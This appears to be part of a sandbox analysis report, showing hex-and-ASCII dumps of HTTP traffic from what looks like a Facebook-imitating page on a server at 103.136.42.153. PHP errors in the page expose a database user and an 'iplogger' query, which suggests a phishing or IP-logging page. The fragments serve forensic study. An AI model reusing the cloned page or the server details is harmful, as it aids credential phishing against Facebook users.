2022-10-07 13:58:40 UTC	44	IN	Data Raw: 74 2e 73 6b 79 2e 63 6f 6d 22 2c 22 67 72 61 70 68 69 74 65 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 22 2c 22 77 77 77 2e 6b 66 63 2e 63 6f 2e 74 68 22 2c 22 6c 65 61 72 6e 2e 70 61 6e 74 68 65 6f 6e 2e 69 6f 22 2c 22 77 77 77 2e 6c 61 6e 64 6d 61 72 6b 73 68 6f 70 73 2e 69 6e 22 2c 22 77 77 77 2e 6e 63 6c 2e 63 6f 6d 22 2c 22 73 30 2e 77 70 2e 63 6f 6d 22 2c 22 77 77 77 2e 74 61 74 61 63 6c 69 71 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 6b 6f 68 6c 73 2e 63 6f 6d 22 2c 22 6c 61 7a 61 64 61 2e 63 6f 2e 74 68 22 2c 22 78 67 34 6b 65 6e 2e 63 6f 6d 22 2c 22 74 65 63 68 6e 6f 70 61 72 6b 2e 72 75 22 2c 22 6f 66 66 69 63 65 64 65 70 6f 74 2e 63 6f 6d 2e 6d 78 22 2c 22 62 65 73 74 62 75 79 2e 63 6f 6d 2e 6d 78 22 2c Data Ascii: t.sky.com","graphite.instagram.com","www.kfc.co.th","learn.pantheon.io","www.landmarkshops.in","www.ncl.com","s0.wp.com","www.tatacliq.com","bs.serving-sys.com","kohls.com","lazada.co.th","xg4ken.com","technopark.ru","officedepot.com.mx","bestbuy.com.mx",
2022-10-07 13:58:40 UTC	46	IN	Data Raw: 5e 29 22 2c 22 5c 2f 5f 45 5c 2f 22 3a 22 28 5b 2e 2c 21 3f 5c 5c 73 5d 7c 24 29 22 7d 2c 22 70 61 74 74 65 72 6e 73 22 3a 7b 22 5c 2f 5c 75 30 30 30 31 28 2e 2a 29 28 27 7c 26 23 30 33 39 3b 29 73 5c 75 30 30 30 31 28 3f 3a 27 7c 26 23 30 33 39 3b 29 73 28 2e 2a 29 5c 2f 22 3a 22 5c 75 30 30 30 31 24 31 24 32 73 5c 75 30 30 30 31 24 33 22 2c 22 5c 2f 5f 5c 75 30 30 30 31 28 5b 5e 5c 75 30 30 30 31 5d 2a 29 5c 75 30 30 30 31 5c 2f 22 3a 22 6a 61 76 61 73 63 72 69 70 74 22 7d 7d 2c 31 34 39 36 5d 2c 5b 22 49 6e 74 6c 56 69 65 77 65 72 43 6f 6e 74 65 78 74 22 2c 5b 5d 2c 7b 22 47 45 4e 44 45 52 22 3a 33 2c 22 72 65 67 69 6f 6e 61 6c 4c 6f 63 61 6c 65 22 3a 6e 75 6c 6c 7d 2c 37 37 32 5d 2c 5b 22 4e 75 6d 62 65 72 46 6f 72 6d 61 74 43 6f 6e 66 69 67 22 2c 5b Data Ascii: ^)","\/_E\/":"([.,!?\\s]\|$)"},"patterns":{"\/\u0001(.)('\|')s\u0001(?:'\|')s(.)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}},1496],["IntlViewerContext",[],{"GENDER":3,"regionalLocale":null},772],["NumberFormatConfig",[
2022-10-07 13:58:40 UTC	47	IN	Data Raw: 6b 5c 2f 22 3a 31 2c 22 5c 2f 65 78 69 74 64 73 69 74 65 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 63 61 72 72 69 65 72 5f 6c 61 6e 64 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 6c 65 78 5c 2f 6c 6f 67 67 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 74 72 22 3a 31 2c 22 5c 2f 74 72 5c 2f 22 3a 31 2c 22 5c 2f 73 65 6d 5f 63 61 6d 70 61 69 67 6e 73 5c 2f 73 65 6d 5f 70 69 78 65 6c 5f 74 65 73 74 5c 2f 22 3a 31 2c 22 5c 2f 62 6f 6f 6b 6d 61 72 6b 73 5c 2f 66 6c 79 6f 75 74 5c 2f 62 6f 64 79 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 62 6e 6f 5c 2f 22 3a 31 2c 22 5c 2f 63 Data Ascii: k\/":1,"\/exitdsite":1,"\/zero\/balance\/pixel\/":1,"\/zero\/balance\/":1,"\/zero\/balance\/carrier_landing\/":1,"\/zero\/flex\/logging\/":1,"\/tr":1,"\/tr\/":1,"\/sem_campaigns\/sem_pixel_test\/":1,"\/bookmarks\/flyout\/body\/":1,"\/zero\/subno\/":1,"\/c
2022-10-07 13:58:40 UTC	49	IN	Data Raw: 6e 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 73 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 63 68 61 6e 6e 65 6c 5c 2f 72 65 63 6f 6e 6e 65 63 74 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 6e 75 78 5c 2f 77 69 7a 61 72 64 5c 2f 6e 61 76 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 70 70 72 65 67 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 62 69 72 74 68 64 61 79 5f 68 65 6c 70 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 72 2e 70 68 70 22 3a 31 Data Ascii: n\/buy\/":1,"\/upsell\/sms\/":1,"\/wap\/a\/channel\/reconnect.php":1,"\/wap\/a\/nux\/wizard\/nav.php":1,"\/wap\/appreg.php":1,"\/wap\/birthday_help.php":1,"\/wap\/c.php":1,"\/wap\/confirmemail.php":1,"\/wap\/cr.php":1,"\/wap\/login.php":1,"\/wap\/r.php":1
2022-10-07 13:58:40 UTC	50	IN	Data Raw: 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 65 6e 61 62 6c 65 5f 62 6c 61 64 65 72 75 6e 6e 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 61 63 6b 22 3a 74 72 75 65 2c 22 70 75 73 68 5f 70 68 61 73 65 22 3a 22 43 33 22 2c 22 65 6e 61 62 6c 65 5f 6f 62 73 65 72 76 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 64 61 74 61 6c 6f 73 73 5f 74 69 6d 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 66 61 6c 6c 62 61 63 6b 5f 66 6f 72 5f 62 72 22 3a 74 72 75 65 2c 22 66 69 78 5f 62 72 5f 69 6e 69 74 5f 72 63 22 3a 66 61 6c 73 65 2c 22 71 75 65 75 65 5f 61 63 74 69 76 61 74 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 22 3a 66 61 6c 73 65 2c 22 6d 61 78 5f 64 65 6c 61 79 5f 62 72 5f 71 75 65 75 65 22 3a 36 30 Data Ascii: ","app_id":"256281040558","enable_bladerunner":false,"enable_ack":true,"push_phase":"C3","enable_observer":false,"enable_dataloss_timer":false,"enable_fallback_for_br":true,"fix_br_init_rc":false,"queue_activation_experiment":false,"max_delay_br_queue":60
2022-10-07 13:58:40 UTC	51	IN	Data Raw: 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 2c 22 41 61 30 68 5a 53 52 35 47 39 66 35 32 65 76 6a 35 32 7a 59 63 59 56 52 4e 61 34 5f 6c 30 51 59 39 65 33 34 44 78 43 47 4c 59 54 78 52 5f 32 64 62 74 6e 48 6d 55 4b 63 63 36 49 31 49 44 67 54 78 65 53 6d 2d 71 47 41 39 72 61 4a 4d 56 63 47 65 4e 4b 55 48 76 46 38 42 51 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 33 35 37 39 22 2c 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 2c 22 41 61 30 68 5a 53 52 35 47 39 66 35 32 65 76 6a 35 32 7a 59 63 59 56 52 4e 61 34 5f 6c 30 51 59 39 65 33 34 44 78 43 47 4c 59 54 78 52 5f 32 64 62 74 6e 48 6d 55 4b 63 63 36 49 31 49 44 67 54 78 Data Ascii: "clearIntervalBlue","Aa0hZSR5G9f52evj52zYcYVRNa4_l0QY9e34DxCGLYTxR_2dbtnHmUKcc6I1IDgTxeSm-qGA9raJMVcGeNKUHvF8BQY"]},-1],["cr:1183579",["InlineFbtResultImpl"],{"__rc":["InlineFbtResultImpl","Aa0hZSR5G9f52evj52zYcYVRNa4_l0QY9e34DxCGLYTxR_2dbtnHmUKcc6I1IDgTx
2022-10-07 13:58:40 UTC	53	IN	Data Raw: 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 7d 2c 32 33 39 33 5d 2c 5b 22 49 6e 74 6c 43 75 72 72 65 6e 74 4c 6f 63 61 6c 65 22 2c 5b 5d 2c 7b 22 63 6f 64 65 22 3a 22 65 6e 5f 55 53 22 7d 2c 35 39 35 34 5d 2c 5b 22 55 53 49 44 4d 65 74 61 64 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 5f 69 64 22 3a 22 3f 22 2c 22 74 61 62 5f 69 64 22 3a 22 22 2c 22 70 61 67 65 5f 69 64 22 3a 22 50 72 6a 64 79 74 73 6d 75 6d 6f 76 7a 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 5f 69 64 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 36 7d 2c 35 38 38 38 5d 2c 5b 22 63 72 3a 36 38 36 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 30 6b 63 61 70 72 7a 53 7a 67 41 78 35 46 70 4b 32 71 79 74 77 43 75 69 64 36 31 57 4a 5a 4a 71 79 6d 39 57 4d 42 63 35 4f 49 66 6a 52 6c 49 Data Ascii: onfig",[],{},2393],["IntlCurrentLocale",[],{"code":"en_US"},5954],["USIDMetadata",[],{"browser_id":"?","tab_id":"","page_id":"Prjdytsmumovz","transition_id":0,"version":6},5888],["cr:686",[],{"__rc":[null,"Aa0kcaprzSzgAx5FpK2qytwCuid61WJZJqym9WMBc5OIfjRlI
2022-10-07 13:58:40 UTC	54	IN	Data Raw: 74 6c 65 3d 22 47 6f 20 74 6f 20 46 61 63 65 62 6f 6f 6b 20 68 6f 6d 65 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 62 5f 6c 6f 67 6f 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 39 31 36 37 64 36 22 3e 3c 75 3e 46 61 63 65 62 6f 6f 6b 3c 2f 75 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 6c 34 20 72 66 6c 6f 61 74 20 5f 6f 68 66 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 72 6f 79 61 6c 5f 6c 6f 67 69 6e 5f 66 6f 72 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 69 64 3d 22 75 5f 30 5f 30 5f 64 53 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 77 68 69 74 65 22 3e 4a 6f 69 6e 20 6f 72 20 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 20 e2 80 89 20 3c 69 20 Data Ascii: tle="Go to Facebook home"><i class="fb_logo img sp_ot1t5YjYL3s sx_9167d6"><u>Facebook</u></i></a></h1></div><div class="_yl4 rfloat _ohf" data-testid="royal_login_form"><a href="/" id="u_0_0_dS"><span style="color: white">Join or Log Into Facebook <i
2022-10-07 13:58:40 UTC	56	IN	Data Raw: 22 6f 66 66 22 20 6e 61 6d 65 3d 22 74 69 6d 65 7a 6f 6e 65 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 33 5f 50 39 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 6c 67 6e 64 69 6d 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 34 5f 41 42 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6c 67 6e 72 6e 64 22 20 76 61 6c 75 65 3d 22 30 36 35 38 34 30 5f 74 59 4b 38 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 6c 67 6e 6a 73 22 20 6e 61 6d 65 3d 22 6c 67 6e 6a 73 22 20 76 61 6c 75 65 3d 22 6e 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 Data Ascii: "off" name="timezone" value="" id="u_0_3_P9" /><input type="hidden" autocomplete="off" name="lgndim" value="" id="u_0_4_AB" /><input type="hidden" name="lgnrnd" value="065840_tYK8" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><input type="hi
2022-10-07 13:58:40 UTC	57	IN	Data Raw: 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 76 6c 20 5f 34 2d 64 6f 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 5f 34 2d 64 70 22 3e 54 68 69 73 20 70 61 67 65 20 69 73 6e 26 23 30 33 39 3b 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 3c 68 33 20 63 6c 61 73 73 3d 22 5f 34 2d 64 71 22 3e 54 68 65 20 6c 69 6e 6b 20 79 6f 75 20 66 6f 6c 6c 6f 77 65 64 20 6d 61 79 20 62 65 20 62 72 6f 6b 65 6e 2c 20 6f 72 20 74 68 65 20 70 61 67 65 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2e 3c 2f 68 33 3e 3c 69 20 63 6c 61 73 73 3d 22 6d 76 6c 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 37 37 38 38 63 30 22 3e 3c 2f 69 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 62 6c 20 70 76 6c 20 5f 34 2d 64 72 20 66 73 6d Data Ascii: ="main"><div class="pvl _4-do"><h2 class="_4-dp">This page isn't available</h2><h3 class="_4-dq">The link you followed may be broken, or the page may have been removed.</h3><i class="mvl img sp_ot1t5YjYL3s sx_7788c0"></i><div class="mbl pvl _4-dr fsm
2022-10-07 13:58:40 UTC	59	IN	Data Raw: 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 Data Ascii: 3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost
2022-10-07 13:58:40 UTC	60	IN	Data Raw: 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 Data Ascii: moved\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u0
2022-10-07 13:58:40 UTC	62	IN	Data Raw: 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 Data Ascii: 520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u
2022-10-07 13:58:40 UTC	63	IN	Data Raw: 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 Data Ascii: 136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%
2022-10-07 13:58:40 UTC	65	IN	Data Raw: 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 Data Ascii: sword:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u002
2022-10-07 13:58:40 UTC	66	IN	Data Raw: 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 31 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 46 72 65 6e 63 68 20 28 46 72 61 6e 63 65 29 22 3e 46 72 61 6e c3 a7 61 69 73 20 28 46 72 61 6e 63 65 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 44 65 70 72 65 63 61 74 65 64 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 Data Ascii: t;www_list_selector", 1); return false;" title="French (France)">Franais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is
2022-10-07 13:58:40 UTC	68	IN	Data Raw: 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 69 74 5f 49 54 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 44 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c Data Ascii: ont%3E" onclick="require("IntlUtils").setCookieLocale("it_IT", "en_US", "https:\/\/it-it.facebook.com\/\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EDeprecated\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\
2022-10-07 13:58:40 UTC	69	IN	Data Raw: 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 30 30 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 73 Data Ascii: abase.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523000000\u002522\u00253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Acces
2022-10-07 13:58:40 UTC	71	IN	Data Raw: 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 Data Ascii: ser%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%
